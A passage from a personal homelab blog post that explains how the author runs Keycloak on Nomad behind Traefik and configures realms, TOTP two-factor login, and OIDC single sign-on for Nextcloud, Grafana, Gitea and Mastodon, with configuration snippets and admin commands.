style="color:#66d9ef">robots</span>.<span style="color:#66d9ef">txt</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/health/ready&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;quay.io/keycloak/keycloak:21.0.2&#34;</span>
</span></span><span style="display:flex;"><span>        command <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;start&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;keycloak&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">env</span> {
</span></span><span style="display:flex;"><span>        KC_DB <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>        KC_DB_URL_DATABASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;keycloak&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HOSTNAME <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;login.example.com&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HOSTNAME_STRICT_BACKCHANNEL <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        KC_PROXY <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;edge&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HEALTH_ENABLED <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        KC_LOG_CONSOLE_OUTPUT <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;</span><span style="color:#66d9ef">EOH</span>
</span></span><span style="display:flex;"><span>KEYCLOAK_ADMIN<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;{{with secret &#34;foobar/admin&#34;}}{{.Data.user}}{{end}}&#34;</span>
</span></span><span style="display:flex;"><span>KEYCLOAK_ADMIN_PASSWORD<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">with</span> <span style="color:#66d9ef">secret</span> <span style="color:#e6db74">&#34;foobar/admin&#34;</span>}}{{.<span style="color:#66d9ef">Data</span>.<span style="color:#66d9ef">secret</span> <span style="color:#960050;background-color:#1e0010">|</span> <span style="color:#66d9ef">toJSON</span>}}{{<span style="color:#66d9ef">end</span>}}
</span></span><span style="display:flex;"><span>KC_DB_USERNAME<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;{{with secret &#34;foobar/db&#34;}}{{.Data.user}}{{end}}&#34;</span>
</span></span><span style="display:flex;"><span>KC_DB_PASSWORD<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">with</span> <span style="color:#66d9ef">secret</span> <span style="color:#e6db74">&#34;foobar/db&#34;</span>}}{{.<span style="color:#66d9ef">Data</span>.<span style="color:#66d9ef">pw</span> <span style="color:#960050;background-color:#1e0010">|</span> <span style="color:#66d9ef">toJSON</span>}}{{<span style="color:#66d9ef">end</span>}}
</span></span><span style="display:flex;"><span>KC_DB_URL_HOST<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">env</span> <span style="color:#e6db74">&#34;NOMAD_UPSTREAM_IP_postgres&#34;</span>}}
</span></span><span style="display:flex;"><span>KC_DB_URL_PORT<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">env</span> <span style="color:#e6db74">&#34;NOMAD_UPSTREAM_PORT_postgres&#34;</span>}}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOH</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        env <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/file.env&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">800</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;ve obfuscated it a little bit. At this point, perhaps a small hint to those
who are currently typing &ldquo;security through obscurity doesn&rsquo;t work!!!&rdquo; into their
keyboards - you&rsquo;re entirely right. It doesn&rsquo;t. If it&rsquo;s your only layer of
security. You know what does work? Multi-layered security.</p>
<p>But onward with the job file: The constraint at the beginning isn&rsquo;t too
interesting - it just tells Nomad to schedule the job on an internal node
instead of a DMZ node.</p>
<p>The networking is configured in <code>bridge</code> mode, as I&rsquo;m using Consul Connect for
this job. If you want to read a bit more about Consul Connect, you can have a look
at <a href="https://blog.mei-home.net/posts/consul-mesh-problem/">this article</a>
I wrote recently about a Consul bug I encountered; it contains a section explaining
what Consul Connect does.</p>
<p>The service definition has Nomad register a service called <code>keycloak</code> in the
Consul service registry. It also defines my Postgres service, which runs as
another Nomad job, as an upstream, since Keycloak requires a database to work.</p>
<p>The tags for the service are used to configure the Traefik router for Keycloak:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>  &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-internal.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-internal.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-external.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myexternalentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-external.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>) <span style="color:#960050;background-color:#1e0010">&amp;&amp;</span> <span style="color:#66d9ef">PathPrefix</span>(<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">js</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">realms</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">myrealm</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">resources</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">robots</span>.<span style="color:#66d9ef">txt</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>While the first router, <code>keycloak-internal</code>, is pretty mundane, the external
router is more interesting. For additional security, I&rsquo;m restricting the externally
reachable paths. Notably, only the <code>myrealm</code> realm is accessible externally, which
excludes access to the default <code>master</code> realm and the admin console. I&rsquo;ve also
thought about introducing an extra realm, just for external access, but ultimately decided against it.</p>
<p>The health check is not too special, besides the fact that it needs to be enabled
manually by setting the environment variable <code>KC_HEALTH_ENABLED</code> to <code>true</code>.</p>
<p>Then let&rsquo;s look at the really weird part of Keycloak&rsquo;s setup. As you can see,
I&rsquo;m not using the default command of the Keycloak Docker container, but instead
specify <code>start</code> as the command to be run in the container.
The <a href="https://www.keycloak.org/server/containers">Keycloak docs</a> recommend
building a custom Docker image with the configuration already baked in via
Keycloak&rsquo;s <code>build</code> command, and then starting that image with <code>start --optimized</code>.</p>
<p>This is a weird way of running an app in a container, right? But running it my
way, with the environment variables specified at container startup and a plain
<code>start</code> command, also works perfectly fine.</p>
<p>Of note among the env vars is the <code>KC_PROXY</code> variable. It tells Keycloak a bit
about the HTTP entry path, i.e. whether it is running behind a reverse proxy or not. This
is important because Keycloak has to generate a number of URLs during normal
operation, and it needs to know how external apps can reach it.
My config of <code>KC_PROXY=edge</code> tells Keycloak that it is running behind a proxy
and that the proxy will be terminating HTTPS and communicating with Keycloak via
HTTP. The communication between Traefik and Keycloak is secured by the Consul
Connect mesh connecting the two services.</p>
<p>What disappointed me a bit was the resource requirement. I was only able to
run it stably with 800 MB of memory assigned, which seems like a lot for a service
which, most of the day, doesn&rsquo;t do very much. Okay, it&rsquo;s a Java application,
but still, the consumption seems pretty high. Perhaps I will go the nostalgia
route someday and dig out my notes from when I did a deep dive into
Java&rsquo;s Garbage Collector while writing my Bachelor&rsquo;s thesis. &#x1f642;</p>
<h3 id="setup">Setup</h3>
<p>Once you log in with the admin account for the first time, only one realm will
exist, the <em>master</em> realm. This realm should not be used for any actual users,
and should stay restricted to your admin account. The first step is to create a fresh
realm.</p>
<figure>
    <img loading="lazy" src="new-realm-button.png"
         alt="A screenshot of the Keycloak realm page for the Master realm. It shows the realm choice drop-down, with the Master realm shown as the only choice, and the Create Realm button at the bottom."/> <figcaption>
            <p>The realm chooser with the Create Realm button</p>
        </figcaption>
</figure>

<p>The new realm page doesn&rsquo;t have many options; mainly the <em>Realm name</em> field is
of importance here. I have not used it myself, but the <em>Resource file</em> box can
be used to import a previously exported realm.</p>
<figure>
    <img loading="lazy" src="new-realm-page.png"
         alt="A screenshot of the Keycloak realm creation page. It is headed with &#39;Create Realm&#39;. There are two form fields, one labeled &#39;Resource file&#39; and one labeled &#39;Realm name&#39;. There&#39;s also a toggle labeled &#39;Enabled&#39; at the bottom."/> <figcaption>
            <p>The realm creation page</p>
        </figcaption>
</figure>
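<p>For completeness: such an export file can be produced with Keycloak&rsquo;s <code>export</code>
command. I have not tried this round-trip myself, so treat the following as a rough
sketch; the realm name and file path are placeholders:</p>
<pre tabindex="0"><code># inside the Keycloak container: export a single realm to a JSON file
/opt/keycloak/bin/kc.sh export --realm myrealm --file /tmp/myrealm-export.json
</code></pre>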

<p>Once you&rsquo;ve created a realm, make sure you choose it in the drop-down at the top
left, and always double-check that the right realm is selected when creating users
or clients.</p>
<p>Keycloak&rsquo;s realms are the main container for users, groups and clients. Each
realm gets its own URL under Keycloak&rsquo;s <code>realms</code> path. When we create a <code>blog</code> realm,
it will have all of its endpoints under <code>https://login.example.com/realms/blog</code>.
This is important to remember, as most applications only allow the configuration
of one OIDC provider URL, so any specific service can only ever use a single
realm.</p>
<p>Once the creation is done, the next step is looking at the <em>Realm settings</em>.</p>
<figure>
    <img loading="lazy" src="realm-settings.png"
         alt="A screenshot of the Keycloak realm settings page."/> <figcaption>
            <p>The realm settings page</p>
        </figcaption>
</figure>

<p>Note the <em>Endpoints</em> links at the bottom. When you click them, you will be
redirected to the <code>.well-known/openid-configuration</code> URL for the realm.
This shows you all the configuration of the OIDC endpoint this realm provides.
A lot of the apps I configured later were able to use this <code>well-known</code> config
directly, instead of needing all of those options entered manually.</p>
<figure>
    <img loading="lazy" src="realm-login-settings.png"
         alt="A screenshot of the Keycloak realm login settings page. See the following text for relevant options."/> <figcaption>
            <p>The realm settings page</p>
        </figcaption>
</figure>

<p>For me, the most important options to set here are switching off the
&lsquo;User registration&rsquo; and &lsquo;Edit username&rsquo; features. I&rsquo;m disabling the latter so
that I can later use the <code>preferred_username</code> JWT claim to set the username
in apps when configuring them.</p>
<p>Another thing to configure is email sending, which is done on the <code>Email</code>
tab.</p>
<p>Finally, the <em>Sessions</em> tab allows configuration of idle timeouts
and other TTL settings for sessions.</p>
<figure>
    <img loading="lazy" src="realm-auth.png"
         alt="A screenshot of the Keycloak realm authentication settings page. See the following text for relevant options."/> <figcaption>
            <p>The realm authentication settings page</p>
        </figcaption>
</figure>

<p>The realm authentication settings are the last config for realms. In the <em>Required actions</em>
tab, you can define actions required from any new user before they can use
Keycloak. For example, setting the <em>Update Password</em> toggle to &ldquo;On&rdquo; allows
admins to force a specific newly created user to change their password
after first login. Enabling <em>Set as default action</em> as well will automatically
apply that requirement to all new users.</p>
<p>In my Homelab realm, I force all users to set up OTP and to update their
password.</p>
<h3 id="2fa-configuration">2FA configuration</h3>
<p>One of the major reasons for this entire endeavour was my wish to have 2FA,
at least for public services. And when using Keycloak for user authentication,
that&rsquo;s pretty easy to set up.</p>
<p>In my quest of not relying too much on a single company, I&rsquo;m using <a href="https://freeotp.github.io/">FreeOTP</a>.
It&rsquo;s also a Red Hat product - but hey, it&rsquo;s open source and not by Google. &#x1f609;</p>
<p>For 2FA, Keycloak supports TOTP, the Time-Based One-Time Password. It&rsquo;s an <a href="https://www.ietf.org/rfc/rfc6238.txt">open standard</a>.
The way it works is that the server (Keycloak in our case) and the client app
exchange a secret seed. This seed, together with the current time, feeds a code
generator. The app displays the resulting sequence of numbers, which is then typed
into the authentication field during Keycloak login.</p>
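<p>Just to illustrate the mechanics (this is not part of my setup), the same codes
an authenticator app shows can be generated on the command line with <code>oathtool</code>,
given the base32 seed. The seed below is a made-up example:</p>
<pre tabindex="0"><code># generate the current 6-digit TOTP code from a base32-encoded seed
oathtool --totp -b JBSWY3DPEHPK3PXP

# also print the next few codes, to watch them roll over every 30 seconds
oathtool --totp -b -w 3 JBSWY3DPEHPK3PXP
</code></pre>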
<figure>
    <img loading="lazy" src="new-user.png"
         alt="A screenshot of the Keycloak new user page. In the required actions form field, the &#39;Configure OTP&#39; action is given."/> <figcaption>
            <p>The realm user creation page</p>
        </figcaption>
</figure>

<p>When creating a new user, the user can be forced to configure OTP via the
<code>Required user actions</code> field. In this case, that is not strictly necessary, as
I had already configured OTP setup to be a default required user action.</p>
<figure>
    <img loading="lazy" src="mobile-auth-setup.png"
         alt="A screenshot of the Keycloak mobile auth page. It instructs the user to scan the displayed QR code and then to enter the one-time code provided by the application and click the submit button at the bottom."/> <figcaption>
            <p>The authenticator setup page of keycloak.</p>
        </figcaption>
</figure>

<p>Scanning the provided QR code works without problems, and now, whenever I log in,
Keycloak will also request a TOTP code.</p>
<h2 id="apps">Apps</h2>
<p>Now that the OIDC provider is set up, we can configure the applications.</p>
<p>This is done in two phases. First, we need to create a client in the Keycloak
realm we would like the application to use. This is done in the realm&rsquo;s <em>Clients</em>
menu. There, we need to decide on a type, between the two that Keycloak supports:
<ul>
<li>OIDC (what we will use)</li>
<li>SAML (an older protocol)</li>
</ul>
<p>Then we need to provide a client ID and a name. The client ID will be important
later as part of the client side config, but the name is only metadata and can
be chosen freely.</p>
<p>On the next page, <em>Capability config</em>, it is important to enable <em>Client authentication</em>
and make sure <em>Standard flow</em> is on.</p>
<p>The final client config page configures the domain and URLs of the client.
These are the URLs that Keycloak will accept for this particular client. They
have the following meaning:</p>
<ul>
<li><strong>Root URL:</strong> The root URL for the app, for example <code>https://app.example.com</code></li>
<li><strong>Home URL:</strong> This URL is used wherever Keycloak needs to link to the client.
Normally also just the root URL, e.g. <code>https://app.example.com</code></li>
<li><strong>Valid redirect URIs:</strong> This is a security measure. Here you can define to
which URL a client&rsquo;s auth request is allowed to link
back to. Each client auth request for a user will
contain a redirect link. With this option, Keycloak
will determine whether the provided URL is legitimate.
Otherwise, it will not allow authentication. This is
to prevent a site from redirecting the auth request, which
will have the access token attached, to a malicious
site. An example would be <code>https://app.example.com/*</code>,
which allows any redirect under the root URL of the client.</li>
<li><strong>Valid post logout redirect URIs:</strong> These work in the same way as the valid
redirect URIs, but for the post-logout redirect.</li>
</ul>
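<p>I did all of the above through the admin web UI. For completeness, here is a hedged
sketch of what the same client creation could look like with Keycloak&rsquo;s bundled
<code>kcadm.sh</code> admin CLI. I did not use this myself; the realm and client names are
placeholders, and attribute names may differ between Keycloak versions:</p>
<pre tabindex="0"><code># log in to the admin CLI (run inside the Keycloak container)
/opt/keycloak/bin/kcadm.sh config credentials \
  --server https://login.example.com --realm master --user admin

# create an OIDC client with "Client authentication" and the standard flow enabled
/opt/keycloak/bin/kcadm.sh create clients -r blog \
  -s clientId=my-app \
  -s enabled=true \
  -s publicClient=false \
  -s standardFlowEnabled=true \
  -s rootUrl=https://app.example.com \
  -s baseUrl=https://app.example.com \
  -s 'redirectUris=["https://app.example.com/*"]'
</code></pre>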
<p>Once all of that&rsquo;s done, we can configure the application itself to work with
Keycloak. How that&rsquo;s done depends on the app. But for any app, we need to note
down the client ID we configured in the beginning, as well as the realm URL
and the client secret which Keycloak automatically generates for each client.
This secret can be found on the client&rsquo;s config page within the realm, on the <em>Credentials</em>
tab.</p>
<p>Another useful piece of information is the <code>.well-known</code> URL for the realm.
It can be found under the menu point <em>Realm settings</em> at the very bottom, behind
the <code>OpenID Endpoint Configuration</code> option. It generally has the format
<code>https://login.example.com/realms/&lt;REALM_NAME&gt;/.well-known/openid-configuration</code>.
Some apps allow you to set this URL, and the app will use the JSON document
hosted there to get all of the URLs it needs. Other apps don&rsquo;t have this
functionality and need you to go to that JSON document yourself and copy the
values from there into the app config.</p>
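<p>For the latter case, fetching the document once and picking out the interesting
endpoints is enough. A small sketch, assuming the <code>blog</code> realm from above and that
<code>jq</code> is available:</p>
<pre tabindex="0"><code># fetch the OIDC discovery document for the realm and show the relevant endpoints
curl -s https://login.example.com/realms/blog/.well-known/openid-configuration \
  | jq '{issuer, authorization_endpoint, token_endpoint, userinfo_endpoint, end_session_endpoint}'
</code></pre>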
<p>Now without further ado, let&rsquo;s get into the application configs.</p>
<h3 id="nextcloud">Nextcloud</h3>
<p>Let&rsquo;s start with the worst experience I had during all of this. <a href="https://nextcloud.com/">Nextcloud</a>.
Nextcloud does support SSO with OpenID Connect, but via an &ldquo;App&rdquo;, not natively. At
least <a href="https://github.com/nextcloud/user_oidc">the app</a> comes directly from
Nextcloud.</p>
<p>There were a couple of problems when introducing OIDC into an existing setup.
<strong>Make sure to read this entire section before proceeding!</strong></p>
<p>I used <a href="https://www.schiessle.org/articles/2020/07/26/nextcloud-and-openid-connect/">this article</a>
as a reference for my setup.</p>
<p>The first step is to create the Nextcloud OIDC client in Keycloak, as described above.
Then install the <a href="https://apps.nextcloud.com/apps/user_oidc">OpenID Connect user backend</a>
app in your Nextcloud and go to the app&rsquo;s configuration page in Nextcloud&rsquo;s
admin settings.</p>
<figure>
    <img loading="lazy" src="nc-oidc-config.png"
         alt="A screenshot of the Nextcloud OIDC app config. For the field &#39;Discovery endpoint&#39;, the URL &#39;https://login.example.com/realms/blog/.well-known/openid-configuration&#39; has been entered. The scope filed has been filled with &#39;openid email profile&#39; and the &#39;User ID mapping&#39; field is set to &#39;preferred_username&#39;. The checkbox &#39;User unique user ID&#39; is unchecked."/> <figcaption>
            <p>The Nextcloud oidc_user config page.</p>
        </figcaption>
</figure>

<p>The correct link for the &ldquo;Discovery endpoint&rdquo; can be found on the Keycloak
realm&rsquo;s &ldquo;Realm settings&rdquo; page, at the very bottom. The client ID is set during
creation of the client in Keycloak, and the &ldquo;Client secret&rdquo; can be found on the
&ldquo;Credentials&rdquo; tab of the client config in Keycloak.</p>
<p>The <em>Scope</em> setting describes the kind of information that Nextcloud will
request from Keycloak as part of the JWT token. &ldquo;openid&rdquo; is always required
when using OIDC for auth.</p>
<p>Of importance here is the &ldquo;User ID mapping&rdquo;. By default, this mapping is set
to &ldquo;sub&rdquo;. Sub is, at least in the case of Keycloak, a UUID for a user. So it&rsquo;s
going to be a string of numbers and letters. None too useful in my opinion.
But Keycloak provides another option - the &ldquo;preferred_username&rdquo;. This is the
username provided when a user is created in Keycloak. To make sure that no
impersonation can happen, the option to change usernames can be disabled in
Keycloak.
Finally, make sure not to check &ldquo;Use unique user id&rdquo;. This would create a
username by creating a hash over the &ldquo;Identifier&rdquo; and &ldquo;sub&rdquo; as delivered by
Keycloak.</p>
<p>The above config works in my Nextcloud instance. What did not work for me was
adopting an existing user. When trying to log in via Keycloak, I got error messages
saying that it could not create the user - which makes sense, as the user already
existed.</p>
<p>So did I do the sensible thing and skip Nextcloud for SSO? No, of course not.
Instead, I spent a weekend nuking my Nextcloud instance and setting it up again
from scratch.</p>
<p>Setting up Nextcloud is not the topic here, but still allow me to say: It
went surprisingly fast. I just synced all the content to a disk, exported
contacts and calendar, and then nuked everything. While at it, I also switched
from local storage to S3 as Nextcloud&rsquo;s primary storage.</p>
<p>After recreating the instance and creating the new user by logging in with
Keycloak for the first time, everything worked as expected.</p>
<h3 id="grafana">Grafana</h3>
<p>Grafana&rsquo;s setup was way simpler than Nextcloud&rsquo;s - I was able to just adopt my
already existing user. This seems to work by matching the email and
username of existing users when logging in with Keycloak.</p>
<p>I worked off of <a href="https://grafana.com/docs/grafana/latest/setup-grafana/configure-security/configure-authentication/keycloak/">this official Grafana guide</a>.</p>
<p>The most important thing to note here is that the description of the Keycloak
config is a bit outdated.</p>
<p>The &ldquo;Base URL&rdquo; is now the &ldquo;Home URL&rdquo;. Under the &ldquo;Client scopes&rdquo; tab of the
Keycloak client config, we also have to add &ldquo;offline_access&rdquo; as default.</p>
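<p>On the Grafana side, the guide boils down to the generic OAuth settings. A hedged
sketch of what those settings could look like, expressed here as environment variables
(they mirror the <code>[auth.generic_oauth]</code> section of <code>grafana.ini</code>; client ID, secret
and realm name are placeholders, not my actual values):</p>
<pre tabindex="0"><code>GF_AUTH_GENERIC_OAUTH_ENABLED=true
GF_AUTH_GENERIC_OAUTH_NAME=Keycloak
GF_AUTH_GENERIC_OAUTH_CLIENT_ID=my-grafana-keycloak-client
GF_AUTH_GENERIC_OAUTH_CLIENT_SECRET=12345
GF_AUTH_GENERIC_OAUTH_SCOPES=openid email profile offline_access
GF_AUTH_GENERIC_OAUTH_AUTH_URL=https://login.example.com/realms/blog/protocol/openid-connect/auth
GF_AUTH_GENERIC_OAUTH_TOKEN_URL=https://login.example.com/realms/blog/protocol/openid-connect/token
GF_AUTH_GENERIC_OAUTH_API_URL=https://login.example.com/realms/blog/protocol/openid-connect/userinfo
</code></pre>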
<p>And that&rsquo;s it already. There is a bit more in the guide, if you would also like
to administer Grafana groups with Keycloak, but I did not try that, as there&rsquo;s
currently only one user - me. &#x1f604;</p>
<h3 id="gitea">Gitea</h3>
<p>Gitea, like Grafana, allows adopting an existing user. Interestingly, OIDC SSO
cannot be configured in the config file, but only via the admin
web interface.</p>
<figure>
    <img loading="lazy" src="gitea-config.png"
         alt="A screenshot of the Gitea admin config page for auth methods. Everything is in German. The auth type is set to &#39;OAuth2&#39;. The Authname is &#39;my-keycloak&#39;. OAuth2 Provider is set to &#39;OpenID Connect&#39; and the &#39;OpenId Connect Auto discovery URL&#39; is set to &#39;https://login.example.com/realms/homelab/.well-known/openid-configuration&#39;"/> <figcaption>
            <p>The Gitea config page for authentication methods.</p>
        </figcaption>
</figure>

<h3 id="mastodon">Mastodon</h3>
<p>And last but not least, Mastodon also supports OIDC, and also happily adopts
existing users. Sadly, I wasn&rsquo;t able to find any good guide on how to configure
Mastodon, so I went with a couple of examples I saw in GitHub issues like
<a href="https://github.com/mastodon/mastodon/issues/7958">this one</a>.</p>
<p>Mastodon uses <a href="https://github.com/omniauth/omniauth">this third-party library</a>
to provide OIDC support.</p>
<p>For the Keycloak client setup, nothing special is needed. All URLs can just be
set to the root URL of your Mastodon instance, e.g. <code>https://social.example.com/</code>.</p>
<p>The Mastodon config itself is done via environment variables. One note here:
If you are running Mastodon in containers, the environment variables only need
to be defined for your &ldquo;web&rdquo; container.</p>
<p>I set the following variables in my config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>OIDC_CLIENT_ID<span style="color:#f92672">=</span>my-mastodon-keycloak-client
</span></span><span style="display:flex;"><span>OIDC_CLIENT_SECRET<span style="color:#f92672">=</span><span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>OIDC_ENABLED <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OMNIAUTH_ONLY <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_DISPLAY_NAME <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Login with Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_ISSUER <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://login.example.com/realms/blog&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_DISCOVERY <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_SCOPE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;openid,profile,email&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_UID_FIELD <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_REDIRECT_URI <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://social.example.com/auth/auth/openid_connect/callback&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_SECURITY_ASSUME_EMAIL_IS_VERIFIED <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_END_SESSION_ENDPOINT <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://login.example.com/realms/blog/protocol/openid-connect/logout&#34;</span>
</span></span></code></pre></div><p>Most of these options should be self-explanatory. The <code>OIDC_ISSUER</code> is the URL
to the realm in Keycloak. When <code>OIDC_DISCOVERY</code> is set to <code>true</code>, Mastodon will
automatically use the <code>.well-known</code> URL to get all the necessary info.</p>
<p>The <code>OIDC_UID_FIELD</code> allows you to choose where the username comes from
in the JWT token sent by Keycloak.</p>
<p>The <code>OMNIAUTH_ONLY</code> setting allows you to define that logins are only possible
via OIDC and nothing else. This disables local logins completely.</p>
<h2 id="final-words-and-alternatives">Final words and alternatives</h2>
<p>All in all, the configuration went pretty well, if we ignore Nextcloud for a
bit.</p>
<p>One problem with introducing SSO is that support is far from universal. For
example, in Open Core apps, SSO is generally treated as an Enterprise-only option,
put behind the big 100k-per-year-per-user subscription. In other cases,
supporting SSO is just not a high priority.
For these cases, there is the possibility to use something like <a href="https://doc.traefik.io/traefik/middlewares/http/forwardauth/">Traefik forward auth</a>. <a href="https://geek-cookbook.funkypenguin.co.nz/docker-swarm/traefik-forward-auth/keycloak/">Funky Penguin</a> has a nice write-up, but I haven&rsquo;t gotten around to
trying it yet.</p>
<p>One big downside I encountered with Keycloak: You cannot set fine-grained
permissions per client. What I mostly wanted was: Only allowing certain users to
auth to certain clients. This functionality is completely missing. Once a user
is a member of a realm, they can access any client, unless the client itself
does some checking. Which few of them do.
This has even been a problem recently. I wanted to offer some friends access to a
few of my self-hosted apps, Nextcloud among them. But Nextcloud uses my
own realm, so I would have to provide them access to all apps using SSO.
It&rsquo;s not too bad in this case, as these were close friends and I trust them,
but in a more general use case, this seems like a pretty big oversight.</p>
<p>Finally, I also wanted to talk about why I decided against using Vault as my OIDC
provider, considering that I already have it set up.
The problem: I&rsquo;m using it for all of my Homelab related secrets. Everything that
needs to be used in an automated way comes from Vault, most importantly the
secrets for all of my Nomad jobs. And after some consideration, I decided that
